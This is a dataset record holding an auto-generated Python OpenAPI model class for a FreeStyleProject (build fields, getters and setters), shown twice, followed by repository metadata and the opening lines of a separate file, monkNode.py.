:param full_display_name: The full_display_name of this FreeStyleProject. # noqa: E501
:type full_display_name: str
:param full_name: The full_name of this FreeStyleProject. # noqa: E501
:type full_name: str
:param buildable: The buildable of this FreeStyleProject. # noqa: E501
:type buildable: bool
:param builds: The builds of this FreeStyleProject. # noqa: E501
:type builds: List[FreeStyleBuild]
:param first_build: The first_build of this FreeStyleProject. # noqa: E501
:type first_build: FreeStyleBuild
:param health_report: The health_report of this FreeStyleProject. # noqa: E501
:type health_report: List[FreeStyleProjecthealthReport]
:param in_queue: The in_queue of this FreeStyleProject. # noqa: E501
:type in_queue: bool
:param keep_dependencies: The keep_dependencies of this FreeStyleProject. # noqa: E501
:type keep_dependencies: bool
:param last_build: The last_build of this FreeStyleProject. # noqa: E501
:type last_build: FreeStyleBuild
:param last_completed_build: The last_completed_build of this FreeStyleProject. # noqa: E501
:type last_completed_build: FreeStyleBuild
:param last_failed_build: The last_failed_build of this FreeStyleProject. # noqa: E501
:type last_failed_build: str
:param last_stable_build: The last_stable_build of this FreeStyleProject. # noqa: E501
:type last_stable_build: FreeStyleBuild
:param last_successful_build: The last_successful_build of this FreeStyleProject. # noqa: E501
:type last_successful_build: FreeStyleBuild
:param last_unstable_build: The last_unstable_build of this FreeStyleProject. # noqa: E501
:type last_unstable_build: str
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject. # noqa: E501
:type last_unsuccessful_build: str
:param next_build_number: The next_build_number of this FreeStyleProject. # noqa: E501
:type next_build_number: int
:param queue_item: The queue_item of this FreeStyleProject. # noqa: E501
:type queue_item: str
:param concurrent_build: The concurrent_build of this FreeStyleProject. # noqa: E501
:type concurrent_build: bool
:param scm: The scm of this FreeStyleProject. # noqa: E501
:type scm: NullSCM
"""
self.openapi_types = {
'_class': str,
'name': str,
'url': str,
'color': str,
'actions': List[FreeStyleProjectactions],
'description': str,
'display_name': str,
'display_name_or_null': str,
'full_display_name': str,
'full_name': str,
'buildable': bool,
'builds': List[FreeStyleBuild],
'first_build': FreeStyleBuild,
'health_report': List[FreeStyleProjecthealthReport],
'in_queue': bool,
'keep_dependencies': bool,
'last_build': FreeStyleBuild,
'last_completed_build': FreeStyleBuild,
'last_failed_build': str,
'last_stable_build': FreeStyleBuild,
'last_successful_build': FreeStyleBuild,
'last_unstable_build': str,
'last_unsuccessful_build': str,
'next_build_number': int,
'queue_item': str,
'concurrent_build': bool,
'scm': NullSCM
}
self.attribute_map = {
'_class': '_class',
'name': 'name',
'url': 'url',
'color': 'color',
'actions': 'actions',
'description': 'description',
'display_name': 'displayName',
'display_name_or_null': 'displayNameOrNull',
'full_display_name': 'fullDisplayName',
'full_name': 'fullName',
'buildable': 'buildable',
'builds': 'builds',
'first_build': 'firstBuild',
'health_report': 'healthReport',
'in_queue': 'inQueue',
'keep_dependencies': 'keepDependencies',
'last_build': 'lastBuild',
'last_completed_build': 'lastCompletedBuild',
'last_failed_build': 'lastFailedBuild',
'last_stable_build': 'lastStableBuild',
'last_successful_build': 'lastSuccessfulBuild',
'last_unstable_build': 'lastUnstableBuild',
'last_unsuccessful_build': 'lastUnsuccessfulBuild',
'next_build_number': 'nextBuildNumber',
'queue_item': 'queueItem',
'concurrent_build': 'concurrentBuild',
'scm': 'scm'
}
self.__class = _class
self._name = name
self._url = url
self._color = color
self._actions = actions
self._description = description
self._display_name = display_name
self._display_name_or_null = display_name_or_null
self._full_display_name = full_display_name
self._full_name = full_name
self._buildable = buildable
self._builds = builds
self._first_build = first_build
self._health_report = health_report
self._in_queue = in_queue
self._keep_dependencies = keep_dependencies
self._last_build = last_build
self._last_completed_build = last_completed_build
self._last_failed_build = last_failed_build
self._last_stable_build = last_stable_build
self._last_successful_build = last_successful_build
self._last_unstable_build = last_unstable_build
self._last_unsuccessful_build = last_unsuccessful_build
self._next_build_number = next_build_number
self._queue_item = queue_item
self._concurrent_build = concurrent_build
self._scm = scm
@classmethod
def from_dict(cls, dikt) -> 'FreeStyleProject':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The FreeStyleProject of this FreeStyleProject. # noqa: E501
:rtype: FreeStyleProject
"""
return util.deserialize_model(dikt, cls)
@property
def _class(self):
"""Gets the _class of this FreeStyleProject.
:return: The _class of this FreeStyleProject.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this FreeStyleProject.
:param _class: The _class of this FreeStyleProject.
:type _class: str
"""
self.__class = _class
@property
def name(self):
"""Gets the name of this FreeStyleProject.
:return: The name of this FreeStyleProject.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FreeStyleProject.
:param name: The name of this FreeStyleProject.
:type name: str
"""
self._name = name
@property
def url(self):
"""Gets the url of this FreeStyleProject.
:return: The url of this FreeStyleProject.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this FreeStyleProject.
:param url: The url of this FreeStyleProject.
:type url: str
"""
self._url = url
@property
def color(self):
"""Gets the color of this FreeStyleProject.
:return: The color of this FreeStyleProject.
:rtype: str
"""
return self._color
@color.setter
def color(self, color):
"""Sets the color of this FreeStyleProject.
:param color: The color of this FreeStyleProject.
:type color: str
"""
self._color = color
@property
def actions(self):
"""Gets the actions of this FreeStyleProject.
:return: The actions of this FreeStyleProject.
:rtype: List[FreeStyleProjectactions]
"""
return self._actions
@actions.setter
def actions(self, actions):
"""Sets the actions of this FreeStyleProject.
:param actions: The actions of this FreeStyleProject.
:type actions: List[FreeStyleProjectactions]
"""
self._actions = actions
@property
def description(self):
"""Gets the description of this FreeStyleProject.
:return: The description of this FreeStyleProject.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this FreeStyleProject.
:param description: The description of this FreeStyleProject.
:type description: str
"""
self._description = description
@property
def display_name(self):
"""Gets the display_name of this FreeStyleProject.
:return: The display_name of this FreeStyleProject.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this FreeStyleProject.
:param display_name: The display_name of this FreeStyleProject.
:type display_name: str
"""
self._display_name = display_name
@property
def display_name_or_null(self):
"""Gets the display_name_or_null of this FreeStyleProject.
:return: The display_name_or_null of this FreeStyleProject.
:rtype: str
"""
return self._display_name_or_null
@display_name_or_null.setter
def display_name_or_null(self, display_name_or_null):
"""Sets the display_name_or_null of this FreeStyleProject.
:param display_name_or_null: The display_name_or_null of this FreeStyleProject.
:type display_name_or_null: str
"""
self._display_name_or_null = display_name_or_null
@property
def full_display_name(self):
"""Gets the full_display_name of this FreeStyleProject.
:return: The full_display_name of this FreeStyleProject.
:rtype: str
"""
return self._full_display_name
@full_display_name.setter
def full_display_name(self, full_display_name):
"""Sets the full_display_name of this FreeStyleProject.
:param full_display_name: The full_display_name of this FreeStyleProject.
:type full_display_name: str
"""
self._full_display_name = full_display_name
@property
def full_name(self):
"""Gets the full_name of this FreeStyleProject.
:return: The full_name of this FreeStyleProject.
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this FreeStyleProject.
:param full_name: The full_name of this FreeStyleProject.
:type full_name: str
"""
self._full_name = full_name
@property
def buildable(self):
"""Gets the buildable of this FreeStyleProject.
:return: The buildable of this FreeStyleProject.
:rtype: bool
"""
return self._buildable
@buildable.setter
def buildable(self, buildable):
"""Sets the buildable of this FreeStyleProject.
:param buildable: The buildable of this FreeStyleProject.
:type buildable: bool
"""
self._buildable = buildable
@property
def builds(self):
"""Gets the builds of this FreeStyleProject.
:return: The builds of this FreeStyleProject.
:rtype: List[FreeStyleBuild]
"""
return self._builds
@builds.setter
def builds(self, builds):
"""Sets the builds of this FreeStyleProject.
:param builds: The builds of this FreeStyleProject.
:type builds: List[FreeStyleBuild]
"""
self._builds = builds
@property
def first_build(self):
"""Gets the first_build of this FreeStyleProject.
:return: The first_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._first_build
@first_build.setter
def first_build(self, first_build):
"""Sets the first_build of this FreeStyleProject.
:param first_build: The first_build of this FreeStyleProject.
:type first_build: FreeStyleBuild
"""
self._first_build = first_build
@property
def health_report(self):
"""Gets the health_report of this FreeStyleProject.
:return: The health_report of this FreeStyleProject.
:rtype: List[FreeStyleProjecthealthReport]
"""
return self._health_report
@health_report.setter
def health_report(self, health_report):
"""Sets the health_report of this FreeStyleProject.
:param health_report: The health_report of this FreeStyleProject.
:type health_report: List[FreeStyleProjecthealthReport]
"""
self._health_report = health_report
@property
def in_queue(self):
"""Gets the in_queue of this FreeStyleProject.
:return: The in_queue of this FreeStyleProject.
:rtype: bool
"""
return self._in_queue
@in_queue.setter
def in_queue(self, in_queue):
"""Sets the in_queue of this FreeStyleProject.
:param in_queue: The in_queue of this FreeStyleProject.
:type in_queue: bool
"""
self._in_queue = in_queue
@property
def keep_dependencies(self):
"""Gets the keep_dependencies of this FreeStyleProject.
:return: The keep_dependencies of this FreeStyleProject.
:rtype: bool
"""
return self._keep_dependencies
@keep_dependencies.setter
def keep_dependencies(self, keep_dependencies):
"""Sets the keep_dependencies of this FreeStyleProject.
:param keep_dependencies: The keep_dependencies of this FreeStyleProject.
:type keep_dependencies: bool
"""
self._keep_dependencies = keep_dependencies
@property
def last_build(self):
"""Gets the last_build of this FreeStyleProject.
:return: The last_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_build
@last_build.setter
def last_build(self, last_build):
"""Sets the last_build of this FreeStyleProject.
:param last_build: The last_build of this FreeStyleProject.
:type last_build: FreeStyleBuild
"""
self._last_build = last_build
@property
def last_completed_build(self):
"""Gets the last_completed_build of this FreeStyleProject.
:return: The last_completed_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_completed_build
@last_completed_build.setter
def last_completed_build(self, last_completed_build):
"""Sets the last_completed_build of this FreeStyleProject.
:param last_completed_build: The last_completed_build of this FreeStyleProject.
:type last_completed_build: FreeStyleBuild
"""
self._last_completed_build = last_completed_build
@property
def last_failed_build(self):
"""Gets the last_failed_build of this FreeStyleProject.
:return: The last_failed_build of this FreeStyleProject.
:rtype: str
"""
return self._last_failed_build
@last_failed_build.setter
def last_failed_build(self, last_failed_build):
"""Sets the last_failed_build of this FreeStyleProject.
:param last_failed_build: The last_failed_build of this FreeStyleProject.
:type last_failed_build: str
"""
self._last_failed_build = last_failed_build
@property
def last_stable_build(self):
"""Gets the last_stable_build of this FreeStyleProject.
:return: The last_stable_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_stable_build
@last_stable_build.setter
def last_stable_build(self, last_stable_build):
"""Sets the last_stable_build of this FreeStyleProject.
:param last_stable_build: The last_stable_build of this FreeStyleProject.
:type last_stable_build: FreeStyleBuild
"""
self._last_stable_build = last_stable_build
@property
def last_successful_build(self):
"""Gets the last_successful_build of this FreeStyleProject.
:return: The last_successful_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_successful_build
@last_successful_build.setter
def last_successful_build(self, last_successful_build):
"""Sets the last_successful_build of this FreeStyleProject.
:param last_successful_build: The last_successful_build of this FreeStyleProject.
:type last_successful_build: FreeStyleBuild
"""
self._last_successful_build = last_successful_build
@property
def last_unstable_build(self):
"""Gets the last_unstable_build of this FreeStyleProject.
:return: The last_unstable_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unstable_build
@last_unstable_build.setter
def last_unstable_build(self, last_unstable_build):
"""Sets the last_unstable_build of this FreeStyleProject.
:param last_unstable_build: The last_unstable_build of this FreeStyleProject.
:type last_unstable_build: str
"""
self._last_unstable_build = last_unstable_build
@property
def last_unsuccessful_build(self):
"""Gets the last_unsuccessful_build of this FreeStyleProject.
:return: The last_unsuccessful_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unsuccessful_build
@last_unsuccessful_build.setter
def last_unsuccessful_build(self, last_unsuccessful_build):
"""Sets the last_unsuccessful_build of this FreeStyleProject.
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject.
:type last_unsuccessful_build: str
"""
self._last_unsuccessful_build = last_unsuccessful_build
@property
def next_build_number(self):
"""Gets the next_build_number of this FreeStyleProject.
:return: The next_build_number of this FreeStyleProject.
:rtype: int
"""
return self._next_build_number
@next_build_number.setter
def next_build_number(self, next_build_number):
"""Sets the next_build_number of this FreeStyleProject.
:param next_build_number: The next_build_number of this FreeStyleProject.
:type next_build_number: int
"""
self._next_build_number = next_build_number
@property
def queue_item(self):
"""Gets the queue_item of this FreeStyleProject.
:return: The queue_item of this FreeStyleProject.
:rtype: str
"""
return self._queue_item
@queue_item.setter
def queue_item(self, queue_item):
"""Sets the queue_item of this FreeStyleProject.
:param queue_item: The queue_item of this FreeStyleProject.
:type queue_item: str
"""
self._queue_item = queue_item
@property
def concurrent_build(self):
"""Gets the concurrent_build of this FreeStyleProject.
:return: The concurrent_build of this FreeStyleProject.
:rtype: bool
"""
return self._concurrent_build
@concurrent_build.setter
def concurrent_build(self, concurrent_build):
"""Sets the concurrent_build of this FreeStyleProject.
:param concurrent_build: The concurrent_build of this FreeStyleProject.
:type concurrent_build: bool
"""
self._concurrent_build = concurrent_build
@property
def scm(self):
"""Gets the scm of this FreeStyleProject.
:return: The scm of this FreeStyleProject.
:rtype: NullSCM
"""
return self._scm
@scm.setter
def scm(self, scm):
"""Sets the scm of this FreeStyleProject.
:param scm: The scm of this FreeStyleProject.
:type scm: NullSCM
"""
self._scm = scm
| 30.911883 | 557 | 0.661037 | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.free_style_build import FreeStyleBuild
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport
from openapi_server.models.null_scm import NullSCM
from openapi_server import util
from openapi_server.models.free_style_build import FreeStyleBuild # noqa: E501
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions # noqa: E501
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport # noqa: E501
from openapi_server.models.null_scm import NullSCM # noqa: E501
class FreeStyleProject(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, _class=None, name=None, url=None, color=None, actions=None, description=None, display_name=None, display_name_or_null=None, full_display_name=None, full_name=None, buildable=None, builds=None, first_build=None, health_report=None, in_queue=None, keep_dependencies=None, last_build=None, last_completed_build=None, last_failed_build=None, last_stable_build=None, last_successful_build=None, last_unstable_build=None, last_unsuccessful_build=None, next_build_number=None, queue_item=None, concurrent_build=None, scm=None): # noqa: E501
"""FreeStyleProject - a model defined in OpenAPI
:param _class: The _class of this FreeStyleProject. # noqa: E501
:type _class: str
:param name: The name of this FreeStyleProject. # noqa: E501
:type name: str
:param url: The url of this FreeStyleProject. # noqa: E501
:type url: str
:param color: The color of this FreeStyleProject. # noqa: E501
:type color: str
:param actions: The actions of this FreeStyleProject. # noqa: E501
:type actions: List[FreeStyleProjectactions]
:param description: The description of this FreeStyleProject. # noqa: E501
:type description: str
:param display_name: The display_name of this FreeStyleProject. # noqa: E501
:type display_name: str
:param display_name_or_null: The display_name_or_null of this FreeStyleProject. # noqa: E501
:type display_name_or_null: str
:param full_display_name: The full_display_name of this FreeStyleProject. # noqa: E501
:type full_display_name: str
:param full_name: The full_name of this FreeStyleProject. # noqa: E501
:type full_name: str
:param buildable: The buildable of this FreeStyleProject. # noqa: E501
:type buildable: bool
:param builds: The builds of this FreeStyleProject. # noqa: E501
:type builds: List[FreeStyleBuild]
:param first_build: The first_build of this FreeStyleProject. # noqa: E501
:type first_build: FreeStyleBuild
:param health_report: The health_report of this FreeStyleProject. # noqa: E501
:type health_report: List[FreeStyleProjecthealthReport]
:param in_queue: The in_queue of this FreeStyleProject. # noqa: E501
:type in_queue: bool
:param keep_dependencies: The keep_dependencies of this FreeStyleProject. # noqa: E501
:type keep_dependencies: bool
:param last_build: The last_build of this FreeStyleProject. # noqa: E501
:type last_build: FreeStyleBuild
:param last_completed_build: The last_completed_build of this FreeStyleProject. # noqa: E501
:type last_completed_build: FreeStyleBuild
:param last_failed_build: The last_failed_build of this FreeStyleProject. # noqa: E501
:type last_failed_build: str
:param last_stable_build: The last_stable_build of this FreeStyleProject. # noqa: E501
:type last_stable_build: FreeStyleBuild
:param last_successful_build: The last_successful_build of this FreeStyleProject. # noqa: E501
:type last_successful_build: FreeStyleBuild
:param last_unstable_build: The last_unstable_build of this FreeStyleProject. # noqa: E501
:type last_unstable_build: str
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject. # noqa: E501
:type last_unsuccessful_build: str
:param next_build_number: The next_build_number of this FreeStyleProject. # noqa: E501
:type next_build_number: int
:param queue_item: The queue_item of this FreeStyleProject. # noqa: E501
:type queue_item: str
:param concurrent_build: The concurrent_build of this FreeStyleProject. # noqa: E501
:type concurrent_build: bool
:param scm: The scm of this FreeStyleProject. # noqa: E501
:type scm: NullSCM
"""
self.openapi_types = {
'_class': str,
'name': str,
'url': str,
'color': str,
'actions': List[FreeStyleProjectactions],
'description': str,
'display_name': str,
'display_name_or_null': str,
'full_display_name': str,
'full_name': str,
'buildable': bool,
'builds': List[FreeStyleBuild],
'first_build': FreeStyleBuild,
'health_report': List[FreeStyleProjecthealthReport],
'in_queue': bool,
'keep_dependencies': bool,
'last_build': FreeStyleBuild,
'last_completed_build': FreeStyleBuild,
'last_failed_build': str,
'last_stable_build': FreeStyleBuild,
'last_successful_build': FreeStyleBuild,
'last_unstable_build': str,
'last_unsuccessful_build': str,
'next_build_number': int,
'queue_item': str,
'concurrent_build': bool,
'scm': NullSCM
}
self.attribute_map = {
'_class': '_class',
'name': 'name',
'url': 'url',
'color': 'color',
'actions': 'actions',
'description': 'description',
'display_name': 'displayName',
'display_name_or_null': 'displayNameOrNull',
'full_display_name': 'fullDisplayName',
'full_name': 'fullName',
'buildable': 'buildable',
'builds': 'builds',
'first_build': 'firstBuild',
'health_report': 'healthReport',
'in_queue': 'inQueue',
'keep_dependencies': 'keepDependencies',
'last_build': 'lastBuild',
'last_completed_build': 'lastCompletedBuild',
'last_failed_build': 'lastFailedBuild',
'last_stable_build': 'lastStableBuild',
'last_successful_build': 'lastSuccessfulBuild',
'last_unstable_build': 'lastUnstableBuild',
'last_unsuccessful_build': 'lastUnsuccessfulBuild',
'next_build_number': 'nextBuildNumber',
'queue_item': 'queueItem',
'concurrent_build': 'concurrentBuild',
'scm': 'scm'
}
self.__class = _class
self._name = name
self._url = url
self._color = color
self._actions = actions
self._description = description
self._display_name = display_name
self._display_name_or_null = display_name_or_null
self._full_display_name = full_display_name
self._full_name = full_name
self._buildable = buildable
self._builds = builds
self._first_build = first_build
self._health_report = health_report
self._in_queue = in_queue
self._keep_dependencies = keep_dependencies
self._last_build = last_build
self._last_completed_build = last_completed_build
self._last_failed_build = last_failed_build
self._last_stable_build = last_stable_build
self._last_successful_build = last_successful_build
self._last_unstable_build = last_unstable_build
self._last_unsuccessful_build = last_unsuccessful_build
self._next_build_number = next_build_number
self._queue_item = queue_item
self._concurrent_build = concurrent_build
self._scm = scm
@classmethod
def from_dict(cls, dikt) -> 'FreeStyleProject':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The FreeStyleProject of this FreeStyleProject. # noqa: E501
:rtype: FreeStyleProject
"""
return util.deserialize_model(dikt, cls)
@property
def _class(self):
"""Gets the _class of this FreeStyleProject.
:return: The _class of this FreeStyleProject.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this FreeStyleProject.
:param _class: The _class of this FreeStyleProject.
:type _class: str
"""
self.__class = _class
@property
def name(self):
"""Gets the name of this FreeStyleProject.
:return: The name of this FreeStyleProject.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FreeStyleProject.
:param name: The name of this FreeStyleProject.
:type name: str
"""
self._name = name
@property
def url(self):
"""Gets the url of this FreeStyleProject.
:return: The url of this FreeStyleProject.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this FreeStyleProject.
:param url: The url of this FreeStyleProject.
:type url: str
"""
self._url = url
@property
def color(self):
"""Gets the color of this FreeStyleProject.
:return: The color of this FreeStyleProject.
:rtype: str
"""
return self._color
@color.setter
def color(self, color):
"""Sets the color of this FreeStyleProject.
:param color: The color of this FreeStyleProject.
:type color: str
"""
self._color = color
@property
def actions(self):
"""Gets the actions of this FreeStyleProject.
:return: The actions of this FreeStyleProject.
:rtype: List[FreeStyleProjectactions]
"""
return self._actions
@actions.setter
def actions(self, actions):
"""Sets the actions of this FreeStyleProject.
:param actions: The actions of this FreeStyleProject.
:type actions: List[FreeStyleProjectactions]
"""
self._actions = actions
@property
def description(self):
"""Gets the description of this FreeStyleProject.
:return: The description of this FreeStyleProject.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this FreeStyleProject.
:param description: The description of this FreeStyleProject.
:type description: str
"""
self._description = description
@property
def display_name(self):
"""Gets the display_name of this FreeStyleProject.
:return: The display_name of this FreeStyleProject.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this FreeStyleProject.
:param display_name: The display_name of this FreeStyleProject.
:type display_name: str
"""
self._display_name = display_name
@property
def display_name_or_null(self):
"""Gets the display_name_or_null of this FreeStyleProject.
:return: The display_name_or_null of this FreeStyleProject.
:rtype: str
"""
return self._display_name_or_null
@display_name_or_null.setter
def display_name_or_null(self, display_name_or_null):
"""Sets the display_name_or_null of this FreeStyleProject.
:param display_name_or_null: The display_name_or_null of this FreeStyleProject.
:type display_name_or_null: str
"""
self._display_name_or_null = display_name_or_null
@property
def full_display_name(self):
"""Gets the full_display_name of this FreeStyleProject.
:return: The full_display_name of this FreeStyleProject.
:rtype: str
"""
return self._full_display_name
@full_display_name.setter
def full_display_name(self, full_display_name):
"""Sets the full_display_name of this FreeStyleProject.
:param full_display_name: The full_display_name of this FreeStyleProject.
:type full_display_name: str
"""
self._full_display_name = full_display_name
@property
def full_name(self):
"""Gets the full_name of this FreeStyleProject.
:return: The full_name of this FreeStyleProject.
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this FreeStyleProject.
:param full_name: The full_name of this FreeStyleProject.
:type full_name: str
"""
self._full_name = full_name
@property
def buildable(self):
"""Gets the buildable of this FreeStyleProject.
:return: The buildable of this FreeStyleProject.
:rtype: bool
"""
return self._buildable
@buildable.setter
def buildable(self, buildable):
"""Sets the buildable of this FreeStyleProject.
:param buildable: The buildable of this FreeStyleProject.
:type buildable: bool
"""
self._buildable = buildable
@property
def builds(self):
"""Gets the builds of this FreeStyleProject.
:return: The builds of this FreeStyleProject.
:rtype: List[FreeStyleBuild]
"""
return self._builds
@builds.setter
def builds(self, builds):
"""Sets the builds of this FreeStyleProject.
:param builds: The builds of this FreeStyleProject.
:type builds: List[FreeStyleBuild]
"""
self._builds = builds
@property
def first_build(self):
"""Gets the first_build of this FreeStyleProject.
:return: The first_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._first_build
@first_build.setter
def first_build(self, first_build):
"""Sets the first_build of this FreeStyleProject.
:param first_build: The first_build of this FreeStyleProject.
:type first_build: FreeStyleBuild
"""
self._first_build = first_build
@property
def health_report(self):
"""Gets the health_report of this FreeStyleProject.
:return: The health_report of this FreeStyleProject.
:rtype: List[FreeStyleProjecthealthReport]
"""
return self._health_report
@health_report.setter
def health_report(self, health_report):
"""Sets the health_report of this FreeStyleProject.
:param health_report: The health_report of this FreeStyleProject.
:type health_report: List[FreeStyleProjecthealthReport]
"""
self._health_report = health_report
@property
def in_queue(self):
"""Gets the in_queue of this FreeStyleProject.
:return: The in_queue of this FreeStyleProject.
:rtype: bool
"""
return self._in_queue
@in_queue.setter
def in_queue(self, in_queue):
"""Sets the in_queue of this FreeStyleProject.
:param in_queue: The in_queue of this FreeStyleProject.
:type in_queue: bool
"""
self._in_queue = in_queue
@property
def keep_dependencies(self):
"""Gets the keep_dependencies of this FreeStyleProject.
:return: The keep_dependencies of this FreeStyleProject.
:rtype: bool
"""
return self._keep_dependencies
@keep_dependencies.setter
def keep_dependencies(self, keep_dependencies):
"""Sets the keep_dependencies of this FreeStyleProject.
:param keep_dependencies: The keep_dependencies of this FreeStyleProject.
:type keep_dependencies: bool
"""
self._keep_dependencies = keep_dependencies
@property
def last_build(self):
"""Gets the last_build of this FreeStyleProject.
:return: The last_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_build
@last_build.setter
def last_build(self, last_build):
"""Sets the last_build of this FreeStyleProject.
:param last_build: The last_build of this FreeStyleProject.
:type last_build: FreeStyleBuild
"""
self._last_build = last_build
@property
def last_completed_build(self):
"""Gets the last_completed_build of this FreeStyleProject.
:return: The last_completed_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_completed_build
@last_completed_build.setter
def last_completed_build(self, last_completed_build):
"""Sets the last_completed_build of this FreeStyleProject.
:param last_completed_build: The last_completed_build of this FreeStyleProject.
:type last_completed_build: FreeStyleBuild
"""
self._last_completed_build = last_completed_build
@property
def last_failed_build(self):
"""Gets the last_failed_build of this FreeStyleProject.
:return: The last_failed_build of this FreeStyleProject.
:rtype: str
"""
return self._last_failed_build
@last_failed_build.setter
def last_failed_build(self, last_failed_build):
"""Sets the last_failed_build of this FreeStyleProject.
:param last_failed_build: The last_failed_build of this FreeStyleProject.
:type last_failed_build: str
"""
self._last_failed_build = last_failed_build
@property
def last_stable_build(self):
"""Gets the last_stable_build of this FreeStyleProject.
:return: The last_stable_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_stable_build
@last_stable_build.setter
def last_stable_build(self, last_stable_build):
"""Sets the last_stable_build of this FreeStyleProject.
:param last_stable_build: The last_stable_build of this FreeStyleProject.
:type last_stable_build: FreeStyleBuild
"""
self._last_stable_build = last_stable_build
@property
def last_successful_build(self):
"""Gets the last_successful_build of this FreeStyleProject.
:return: The last_successful_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_successful_build
@last_successful_build.setter
def last_successful_build(self, last_successful_build):
"""Sets the last_successful_build of this FreeStyleProject.
:param last_successful_build: The last_successful_build of this FreeStyleProject.
:type last_successful_build: FreeStyleBuild
"""
self._last_successful_build = last_successful_build
@property
def last_unstable_build(self):
"""Gets the last_unstable_build of this FreeStyleProject.
:return: The last_unstable_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unstable_build
@last_unstable_build.setter
def last_unstable_build(self, last_unstable_build):
"""Sets the last_unstable_build of this FreeStyleProject.
:param last_unstable_build: The last_unstable_build of this FreeStyleProject.
:type last_unstable_build: str
"""
self._last_unstable_build = last_unstable_build
@property
def last_unsuccessful_build(self):
"""Gets the last_unsuccessful_build of this FreeStyleProject.
:return: The last_unsuccessful_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unsuccessful_build
@last_unsuccessful_build.setter
def last_unsuccessful_build(self, last_unsuccessful_build):
"""Sets the last_unsuccessful_build of this FreeStyleProject.
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject.
:type last_unsuccessful_build: str
"""
self._last_unsuccessful_build = last_unsuccessful_build
@property
def next_build_number(self):
"""Gets the next_build_number of this FreeStyleProject.
:return: The next_build_number of this FreeStyleProject.
:rtype: int
"""
return self._next_build_number
@next_build_number.setter
def next_build_number(self, next_build_number):
"""Sets the next_build_number of this FreeStyleProject.
:param next_build_number: The next_build_number of this FreeStyleProject.
:type next_build_number: int
"""
self._next_build_number = next_build_number
@property
def queue_item(self):
"""Gets the queue_item of this FreeStyleProject.
:return: The queue_item of this FreeStyleProject.
:rtype: str
"""
return self._queue_item
@queue_item.setter
def queue_item(self, queue_item):
"""Sets the queue_item of this FreeStyleProject.
:param queue_item: The queue_item of this FreeStyleProject.
:type queue_item: str
"""
self._queue_item = queue_item
@property
def concurrent_build(self):
"""Gets the concurrent_build of this FreeStyleProject.
:return: The concurrent_build of this FreeStyleProject.
:rtype: bool
"""
return self._concurrent_build
@concurrent_build.setter
def concurrent_build(self, concurrent_build):
"""Sets the concurrent_build of this FreeStyleProject.
:param concurrent_build: The concurrent_build of this FreeStyleProject.
:type concurrent_build: bool
"""
self._concurrent_build = concurrent_build
@property
def scm(self):
"""Gets the scm of this FreeStyleProject.
:return: The scm of this FreeStyleProject.
:rtype: NullSCM
"""
return self._scm
@scm.setter
def scm(self, scm):
"""Sets the scm of this FreeStyleProject.
:param scm: The scm of this FreeStyleProject.
:type scm: NullSCM
"""
self._scm = scm
| 0 | 0 | 0 |
f657d71bced67aaaaac27a13df0ae0fb35ce68ed | 10,329 | py | Python | monkNode.py | atria-tools/monk | 4961457f4db5dfa98fc6001a289c24e460e5b025 | [
"Apache-2.0"
] | null | null | null | monkNode.py | atria-tools/monk | 4961457f4db5dfa98fc6001a289c24e460e5b025 | [
"Apache-2.0"
] | 1 | 2015-03-22T12:37:18.000Z | 2015-03-22T12:37:18.000Z | monkNode.py | HeeroYui/monk | 4961457f4db5dfa98fc6001a289c24e460e5b025 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import monkDebug as debug
import monkModule as module
access_list = ['private', 'protected', 'public']
genericUID = 0
##
## @ brief only for namespace :
##
##
##
## @brief Get the list of all specify type
## @param[in] type Type requested ['namespace', 'class', 'struct', 'methode', 'enum', 'define', 'union', 'variable', 'constructor', 'destructor'] (can be a list)
## @param[in] sorted Request to sort the return list.
## @return The requested list or []
##
| 26.759067 | 162 | 0.645367 | #!/usr/bin/python
import monkDebug as debug
import monkModule as module
access_list = ['private', 'protected', 'public']
def debug_space(level):
ret = ""
for iii in range(0,level):
ret += " "
return ret
genericUID = 0
class Node():
